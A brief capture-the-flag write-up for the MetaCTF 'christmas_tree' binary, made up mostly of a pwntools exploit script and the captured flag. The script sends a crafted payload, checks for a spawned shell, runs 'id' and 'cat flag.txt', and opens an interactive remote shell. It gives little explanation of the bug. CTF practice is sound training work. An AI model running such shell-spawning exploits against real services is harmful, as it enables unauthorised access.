Introduction
Recently, I took on an exciting binary exploitation challenge from the MetaCTF website. The objective was to analyze a compiled executable (christmas_tree.bin), identify a vulnerability, and develop an exploit to capture the flag.
Environment & Tools
- Pwntools – Python framework for binary exploitation
- GDB – Debugger for runtime analysis
- ROPgadget – Finding return-oriented programming (ROP) gadgets in the binary
- Checksec – Inspecting security mitigations
Security Mitigations
NX ✅, Stack Canary ✅, PIE ✅, Full RELRO ✅
Final Exploit Script
from pwn import *
import sys

# Crafted input that triggers the bug in christmas_tree.bin (payload from the original exploit)
payload = b"0()(1()(2()(3(4(()(i))((S)()))())))"

def connect():
    """Return a pwntools tube to the target: a local process or a remote service."""
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <local|remote> [host] [port]")
        sys.exit(0)
    if sys.argv[1] == "local":
        return process("./christmas_tree.bin")
    elif sys.argv[1] == "remote" and len(sys.argv) == 4:
        return remote(sys.argv[2], int(sys.argv[3]))
    else:
        print("[-] Invalid arguments!")
        sys.exit(1)

attempt = 1
while True:
    # Reconnect and resend the payload until the exploit lands
    print(f"[*] Attempt {attempt}")
    p = connect()
    p.sendline(b"display")
    p.sendline(payload)
    # Probe command: seeing "Linux" in the output means a shell was spawned
    p.sendline(b"uname -a")
    try:
        p.recvuntil(b"Linux")
        print("[+] Exploit succeeded! Spawning shell...")
        p.sendline(b"id")
        p.sendline(b"cat flag.txt")
        p.interactive()
        break
    except Exception:
        # Usually an EOFError because the target crashed; close and retry
        # (catching Exception rather than a bare except keeps Ctrl-C working)
        print("[-] Exploit failed, retrying...")
        p.close()
        attempt += 1

Flag
MetaCTF{0h_chr1stm4s_tr33_h0w_l0v3ly_4r3_y0ur_br4nch3s}